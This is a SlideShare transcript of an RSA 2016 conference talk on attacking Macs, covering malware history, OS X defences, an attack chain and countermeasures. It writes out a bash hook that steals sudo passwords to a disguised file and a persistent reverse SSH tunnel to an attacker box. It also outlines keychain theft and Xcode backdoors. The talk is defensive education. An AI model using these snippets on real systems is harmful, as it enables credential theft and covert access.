SlideShare a Scribd company logo

Hacking Exposed: The Mac Attack

Priyanka Aash
Priyanka Aash

Windows attacks receive all the attention. However, Mac and Linux have gained in popularity with the adversary. This session will focus on common Mac attack vectors and other cross-platform hacks that are typically seen in enterprise intrusions. We will also cover practical counter measures to make these alternate platforms more resilient. (Source: RSA USA 2016-San Francisco)

Technology
1 of 26
Download to read offline
SESSION ID: #RSAC Dmitri Alperovitch HACKING EXPOSED: MAC ATTACK EXP-R04 Co-Founder & CTO CrowdStrike Inc. @DAlperovitch George Kurtz Co-Founder, President & CEO CrowdStrike Inc. @George_Kurtz
#RSAC GEORGE KURTZ In security for 20 +years President & CEO, CrowdStrike Former CTO, McAfee Former CEO, Foundstone Co-Author, Hacking Exposed 2 A LITTLE ABOUT US:
#RSAC DMITRI ALPEROVITCH Co-Founder & CTO, CrowdStrike Former VP Threat Research, McAfee Author of Operation Aurora, Night Dragon, Shady RAT reports MIT Tech Review’s Top 35 Innovator Under 35 for 2013 Foreign Policy’s Top 100 Leading Global Thinkers for 2013 3 A LITTLE ABOUT US:
#RSAC The Ninjas Matt Bauer Sr. Software Engineer CrowdStrikeJaron Bradley Sr. Intrusion Analyst CrowdStrike
#RSAC Agenda 5 Mac Attacks OSX Security Features Tradecraft The Setup & Attack Plan Demo Countermeasures
#RSAC Mac market share rising 6 StatCounter 89.9 90.55 88.83 86.8 84.83 7.47 7.66 8.72 9.33 9.14 0 10 20 30 40 50 60 70 80 90 100 2012 2013 2014 2015 2016 Desktop/Laptop Market Share 2012-2016 Windows Mac
#RSAC Mac Attacks 7 Winter 2006: Leap Worm Spreads as an archive sent over iChat to local users Limited harmful impact Fall 2007: RSPlug DNSChanger variant for Mac Distributed as fake video codec on porn sites Changed DNS servers to redirect to phishing and porn sites Fall 2010: Koobface Mac version of infamous Facebook worm
#RSAC Mac Attacks (cont) 8 Fall 2011: Flashback Worm > 700,000 infected users Infection via Drive-By Java exploit Winter 2012: Gh0st RAT OSX Variant (MacControl) KEYHOLE PANDA targeted malware targeting Tibetan and Uyghur activists Delivered via Java and Office exploits Summer 2012: OSX/Crisis (Attribution: Hacking Team) Discovered in targeted intrusions Monitors and records Skype, Adium, web browsing Rootkit capabilities
#RSAC Mac Attacks (cont) 9 Fall 2013: OSX/Leverage Discovered in targeted intrusions related to Syria Written in RealBasic Winter 2016: FakeFlash Signed fake Flash player update Installs scareware (FakeAV style)
#RSAC Apple Security Features
#RSAC OSX Security Features 11 Leopard: 2007 Quarantine Bit: extended file attribute flag indicating the file was downloaded from the Web Partial ASLR App Sandbox (Seatbelt) Snow Leopard: 2009 XProtect: AV-style blacklist updated monthly by Apple Lion: 2011 FileVault: full-disk encryption NX, Full ASLR
#RSAC OSX Security Features (cont) 12 Mountain Lion: 2012 Gatekeeper Kernel ASLR Mavericks: 2013 Support code-signing for kernel extensions El Capitan: 2015 Full requirement to code-sign kernel extensions System Integrity Protection: prevent root user from tampering with key system files and raise the bar for rootkits and prevent code injection App Transport Security (ATS): HTTPS with forward secrecy by default in apps
#RSAC Tradecraft
#RSAC Challenges to solve 14 Initial infiltration: Code Execution How to get around Gatekeeper? Possibilities 1. Exploit browser (eg. Java, Flash, native browser exploit) 2. Exploit productivity app (eg. Office, Preview, Adium) 3. Spearphish user with link/attachment (with Gatekeeper hack)
#RSAC Bypassing Gatekeeper 15 Great research by Patrick Wardle @ Synack (VB2015 paper)
#RSAC Challenges to solve (cont) 16 Privilege Escalation How to become root? Possibilities 1. Privesc exploit 2. Hook sudo in bash getpwd () { if [[ $BASH_COMMAND == sudo* ]]; then printf “Password:” read –s PASS; echo $PASS >/tmp/com.apple.launchd.pshbnY173 echo –e “nSorry, try again.n” fi } trap getpwd DEBUG 3. Ask the user during install
#RSAC Challenges to solve (cont) 17 Persistence and Command & Control How to gain & keep remote access? Possibilities 1. Malware 2. Reverse ssh tunnel ssh –fN –R ${PortFwd}:localhost:22 acc@attackbox a. Save in plist file b. Convert to binary with plutil –convert binary1 ${ASEPplist} c. Save in /System/Library/LaunchDaemons (use SIP exception file)
#RSAC Challenges to solve (cont) 18 Stealth How to keep hidden from easy discovery? Possibilities 1. Malware rootkit hooks 2. Bash hooks in /etc/profile “ps aux” before hook “ps aux” after hook
#RSAC Challenges to solve (cont) 19 Permanent backdoor How do we quietly backdoor many other systems/applications? Ken Thompson: “Reflections on Trusting Trust” (1984) Lesson: Backdooring the compiler is the ultimate win Idea: Let’s hijack XCode compilation process
#RSAC XCode hijacking 20 Yet again - great research by Patrick Wardle (CanSecWest 2015) Dylib hijacking (similar to DLL hijacking on Windows) 1. Place a malicious dylib in the search ppath of XCode application 2. Intercept compilation requests and inject backdoor source code, removing any information from the build log 3. PROFIT!
#RSAC Putting it all together: Setup & Attack Plan
#RSAC Attack Overview 22 1. Send spearphish “Software Update” package to victim 2. Package it up with signed binary vulnerable to Gatekeeper bypass 3. Steal root password via UI prompt and sudo hook (failsafe) 4. Establish persistent SSH reverse tunnel via ASEP plist 5. Hook /etc/profile to hide our SSH tunnel, files and root activities 6. Steal victim keychain through SSH tunnel 7. Use stolen keychain to move laterally to Windows systems and exfiltrate data (smbutil) 8. Implant Xcode malicious Dylib to backdoor compiled applications 9. WIN!
#RSAC Network Setup 23 Windows File Share Victim Mac System Attacker Macbook (for keychain extraction) Attacker C2
#RSAC DEMO
#RSAC Countermeasures 25 Keep close eye on /etc/profile, /etc/.bashrc, ~/.bash_profile, ~/.bashrc, ~/.bash_logout and ~/.inputrc Monitor for suspicious network connections out of your environment Monitor for any suspicious DYLIB writes to key /Applications and /System directories Use next-generation Endpoint Detect & Response (EDR) solutions
#RSAC THANK YOU! 26 HOW TO REACH US: TWITTER: @GEORGE_KURTZ & @DALPEROVITCH LEARN MORE ABOUT NEXT-GENERATION ENDPOINT PROTECTION LEARN ABOUT CROWDSTRIKE FALCON: WWW.CROWDSTRIKE.COM/PRODUCTS REQUEST A DEMO: WWW.CROWDSTRIKE.COM/REQUEST-A-DEMO/ COME MEET US: BOOTH 2045 SOUTH HALL

Recommended

Finding Triggered Malice in Android Apps
Finding Triggered Malice in Android AppsFinding Triggered Malice in Android Apps
Finding Triggered Malice in Android Apps
Priyanka Aash
 
Android Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedAndroid Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities Revisited
Priyanka Aash
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android Bot
Priyanka Aash
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
Kaspersky
 
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat Security Conference
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
Antonio Parata
 
.NET for hackers
.NET for hackers.NET for hackers
.NET for hackers
Antonio Parata
 
Wtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicWtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicJaime Blasco
 

Recommended

Finding Triggered Malice in Android Apps
Finding Triggered Malice in Android AppsFinding Triggered Malice in Android Apps
Finding Triggered Malice in Android Apps
Priyanka Aash
 
Android Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedAndroid Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities Revisited
Priyanka Aash
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android Bot
Priyanka Aash
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
Kaspersky
 
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat Security Conference
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
Antonio Parata
 
.NET for hackers
.NET for hackers.NET for hackers
.NET for hackers
Antonio Parata
 
Wtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicWtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicJaime Blasco
 
Hacking ios-on-the-run-using-cycript-viaforensics-rsa-conference-2014
Hacking ios-on-the-run-using-cycript-viaforensics-rsa-conference-2014Hacking ios-on-the-run-using-cycript-viaforensics-rsa-conference-2014
Hacking ios-on-the-run-using-cycript-viaforensics-rsa-conference-2014
viaForensics
 
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
grecsl
 
Bypass Security Checking with Frida
Bypass Security Checking with FridaBypass Security Checking with Frida
Bypass Security Checking with Frida
Satria Ady Pradana
 
BlueHat v18 || A turla gift - popping calc.exe by sending an email
BlueHat v18 || A turla gift - popping calc.exe by sending an emailBlueHat v18 || A turla gift - popping calc.exe by sending an email
BlueHat v18 || A turla gift - popping calc.exe by sending an email
BlueHat Security Conference
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
idsecconf
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
Javier Junquera
 
OpenDaylight Brisbane User Group - OpenDaylight Security
OpenDaylight Brisbane User Group - OpenDaylight SecurityOpenDaylight Brisbane User Group - OpenDaylight Security
OpenDaylight Brisbane User Group - OpenDaylight Security
David Jorm
 
Automatic tool for static analysis
Automatic tool for static analysisAutomatic tool for static analysis
Automatic tool for static analysis
Chong-Kuan Chen
 
Securing your web applications a pragmatic approach
Securing your web applications a pragmatic approachSecuring your web applications a pragmatic approach
Securing your web applications a pragmatic approach
Antonio Parata
 
Extending Zeek for ICS Defense
Extending Zeek for ICS DefenseExtending Zeek for ICS Defense
Extending Zeek for ICS Defense
James Dickenson
 
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
Priyanka Aash
 
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
CODE BLUE
 
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-miningOWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP
 
Building world-class security response and secure development processes
Building world-class security response and secure development processesBuilding world-class security response and secure development processes
Building world-class security response and secure development processes
David Jorm
 
Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token Manipulation
Justin Bui
 
The Art of defence: How vulnerabilites help shape security features and mitig...
The Art of defence: How vulnerabilites help shape security features and mitig...The Art of defence: How vulnerabilites help shape security features and mitig...
The Art of defence: How vulnerabilites help shape security features and mitig...
Priyanka Aash
 
Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2
Freddy Ortiz
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
RootedCON
 
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
RootedCON
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
 
Російські хакери стежили за артилерією ЗСУ через Android
Російські хакери стежили за артилерією ЗСУ через AndroidРосійські хакери стежили за артилерією ЗСУ через Android
Російські хакери стежили за артилерією ЗСУ через Android
tsnua
 
The Shifting Landscape of PoS MalwareOutput
The Shifting Landscape of PoS MalwareOutputThe Shifting Landscape of PoS MalwareOutput
The Shifting Landscape of PoS MalwareOutput
Silas Cutler
 

More Related Content

What's hot

Hacking ios-on-the-run-using-cycript-viaforensics-rsa-conference-2014
Hacking ios-on-the-run-using-cycript-viaforensics-rsa-conference-2014Hacking ios-on-the-run-using-cycript-viaforensics-rsa-conference-2014
Hacking ios-on-the-run-using-cycript-viaforensics-rsa-conference-2014
viaForensics
 
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
grecsl
 
Bypass Security Checking with Frida
Bypass Security Checking with FridaBypass Security Checking with Frida
Bypass Security Checking with Frida
Satria Ady Pradana
 
BlueHat v18 || A turla gift - popping calc.exe by sending an email
BlueHat v18 || A turla gift - popping calc.exe by sending an emailBlueHat v18 || A turla gift - popping calc.exe by sending an email
BlueHat v18 || A turla gift - popping calc.exe by sending an email
BlueHat Security Conference
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
idsecconf
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
Javier Junquera
 
OpenDaylight Brisbane User Group - OpenDaylight Security
OpenDaylight Brisbane User Group - OpenDaylight SecurityOpenDaylight Brisbane User Group - OpenDaylight Security
OpenDaylight Brisbane User Group - OpenDaylight Security
David Jorm
 
Automatic tool for static analysis
Automatic tool for static analysisAutomatic tool for static analysis
Automatic tool for static analysis
Chong-Kuan Chen
 
Securing your web applications a pragmatic approach
Securing your web applications a pragmatic approachSecuring your web applications a pragmatic approach
Securing your web applications a pragmatic approach
Antonio Parata
 
Extending Zeek for ICS Defense
Extending Zeek for ICS DefenseExtending Zeek for ICS Defense
Extending Zeek for ICS Defense
James Dickenson
 
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
Priyanka Aash
 
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
CODE BLUE
 
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-miningOWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP
 
Building world-class security response and secure development processes
Building world-class security response and secure development processesBuilding world-class security response and secure development processes
Building world-class security response and secure development processes
David Jorm
 
Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token Manipulation
Justin Bui
 
The Art of defence: How vulnerabilites help shape security features and mitig...
The Art of defence: How vulnerabilites help shape security features and mitig...The Art of defence: How vulnerabilites help shape security features and mitig...
The Art of defence: How vulnerabilites help shape security features and mitig...
Priyanka Aash
 
Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2
Freddy Ortiz
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
RootedCON
 
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
RootedCON
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
 

What's hot (20)

Hacking ios-on-the-run-using-cycript-viaforensics-rsa-conference-2014
Hacking ios-on-the-run-using-cycript-viaforensics-rsa-conference-2014Hacking ios-on-the-run-using-cycript-viaforensics-rsa-conference-2014
Hacking ios-on-the-run-using-cycript-viaforensics-rsa-conference-2014
 
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
 
Bypass Security Checking with Frida
Bypass Security Checking with FridaBypass Security Checking with Frida
Bypass Security Checking with Frida
 
BlueHat v18 || A turla gift - popping calc.exe by sending an email
BlueHat v18 || A turla gift - popping calc.exe by sending an emailBlueHat v18 || A turla gift - popping calc.exe by sending an email
BlueHat v18 || A turla gift - popping calc.exe by sending an email
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
 
OpenDaylight Brisbane User Group - OpenDaylight Security
OpenDaylight Brisbane User Group - OpenDaylight SecurityOpenDaylight Brisbane User Group - OpenDaylight Security
OpenDaylight Brisbane User Group - OpenDaylight Security
 
Automatic tool for static analysis
Automatic tool for static analysisAutomatic tool for static analysis
Automatic tool for static analysis
 
Securing your web applications a pragmatic approach
Securing your web applications a pragmatic approachSecuring your web applications a pragmatic approach
Securing your web applications a pragmatic approach
 
Extending Zeek for ICS Defense
Extending Zeek for ICS DefenseExtending Zeek for ICS Defense
Extending Zeek for ICS Defense
 
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
 
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
 
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-miningOWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
 
Building world-class security response and secure development processes
Building world-class security response and secure development processesBuilding world-class security response and secure development processes
Building world-class security response and secure development processes
 
Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token Manipulation
 
The Art of defence: How vulnerabilites help shape security features and mitig...
The Art of defence: How vulnerabilites help shape security features and mitig...The Art of defence: How vulnerabilites help shape security features and mitig...
The Art of defence: How vulnerabilites help shape security features and mitig...
 
Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 

Viewers also liked

Російські хакери стежили за артилерією ЗСУ через Android
Російські хакери стежили за артилерією ЗСУ через AndroidРосійські хакери стежили за артилерією ЗСУ через Android
Російські хакери стежили за артилерією ЗСУ через Android
tsnua
 
The Shifting Landscape of PoS MalwareOutput
The Shifting Landscape of PoS MalwareOutputThe Shifting Landscape of PoS MalwareOutput
The Shifting Landscape of PoS MalwareOutput
Silas Cutler
 
Hacking Exposed Live: Mobile Targeted Threats
Hacking Exposed Live: Mobile Targeted ThreatsHacking Exposed Live: Mobile Targeted Threats
Hacking Exposed Live: Mobile Targeted Threats
CrowdStrike
 
CrowdCast Monthly: Operationalizing Intelligence
CrowdCast Monthly: Operationalizing IntelligenceCrowdCast Monthly: Operationalizing Intelligence
CrowdCast Monthly: Operationalizing Intelligence
CrowdStrike
 
CrowdCasts Monthly: You Have an Adversary Problem
CrowdCasts Monthly: You Have an Adversary ProblemCrowdCasts Monthly: You Have an Adversary Problem
CrowdCasts Monthly: You Have an Adversary Problem
CrowdStrike
 
Cisco Switch Security
Cisco Switch SecurityCisco Switch Security
Cisco Switch Security
dkaya
 
Risk Analysis using open FAIR and Adoption of right Security Controls
Risk Analysis using open FAIR and Adoption of right Security ControlsRisk Analysis using open FAIR and Adoption of right Security Controls
Risk Analysis using open FAIR and Adoption of right Security Controls
Priyanka Aash
 
Network Forensics and Practical Packet Analysis
Network Forensics and Practical Packet AnalysisNetwork Forensics and Practical Packet Analysis
Network Forensics and Practical Packet Analysis
Priyanka Aash
 
Practical Applications of Block Chain Technologies
Practical Applications of Block Chain Technologies Practical Applications of Block Chain Technologies
Practical Applications of Block Chain Technologies
Priyanka Aash
 
How to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeHow to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrike
CrowdStrike
 

Viewers also liked (10)

Російські хакери стежили за артилерією ЗСУ через Android
Російські хакери стежили за артилерією ЗСУ через AndroidРосійські хакери стежили за артилерією ЗСУ через Android
Російські хакери стежили за артилерією ЗСУ через Android
 
The Shifting Landscape of PoS MalwareOutput
The Shifting Landscape of PoS MalwareOutputThe Shifting Landscape of PoS MalwareOutput
The Shifting Landscape of PoS MalwareOutput
 
Hacking Exposed Live: Mobile Targeted Threats
Hacking Exposed Live: Mobile Targeted ThreatsHacking Exposed Live: Mobile Targeted Threats
Hacking Exposed Live: Mobile Targeted Threats
 
CrowdCast Monthly: Operationalizing Intelligence
CrowdCast Monthly: Operationalizing IntelligenceCrowdCast Monthly: Operationalizing Intelligence
CrowdCast Monthly: Operationalizing Intelligence
 
CrowdCasts Monthly: You Have an Adversary Problem
CrowdCasts Monthly: You Have an Adversary ProblemCrowdCasts Monthly: You Have an Adversary Problem
CrowdCasts Monthly: You Have an Adversary Problem
 
Cisco Switch Security
Cisco Switch SecurityCisco Switch Security
Cisco Switch Security
 
Risk Analysis using open FAIR and Adoption of right Security Controls
Risk Analysis using open FAIR and Adoption of right Security ControlsRisk Analysis using open FAIR and Adoption of right Security Controls
Risk Analysis using open FAIR and Adoption of right Security Controls
 
Network Forensics and Practical Packet Analysis
Network Forensics and Practical Packet AnalysisNetwork Forensics and Practical Packet Analysis
Network Forensics and Practical Packet Analysis
 
Practical Applications of Block Chain Technologies
Practical Applications of Block Chain Technologies Practical Applications of Block Chain Technologies
Practical Applications of Block Chain Technologies
 
How to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeHow to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrike
 

Similar to Hacking Exposed: The Mac Attack

The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
Priyanka Aash
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
Priyanka Aash
 
Hacking exposed : The adversary Oscars
Hacking exposed : The adversary OscarsHacking exposed : The adversary Oscars
Hacking exposed : The adversary Oscars
Priyanka Aash
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
Ricardo L0gan
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
BHack Conference
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates
 
How Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us VulnerableHow Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us Vulnerable
Ray Potter
 
OSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwareOSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adware
Priyanka Aash
 
Hacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsHacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the Shadows
Priyanka Aash
 
How to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosHow to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laos
Outhai SAIOUDOM
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
Haydn Johnson
 
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
viaForensics
 
The Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CDThe Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CD
James Wickett
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-mac
Cyphort
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
lior mazor
 
Attacks on Critical Infrastructure: Insights from the “Big Board”
Attacks on Critical Infrastructure: Insights from the “Big Board”Attacks on Critical Infrastructure: Insights from the “Big Board”
Attacks on Critical Infrastructure: Insights from the “Big Board”
Priyanka Aash
 
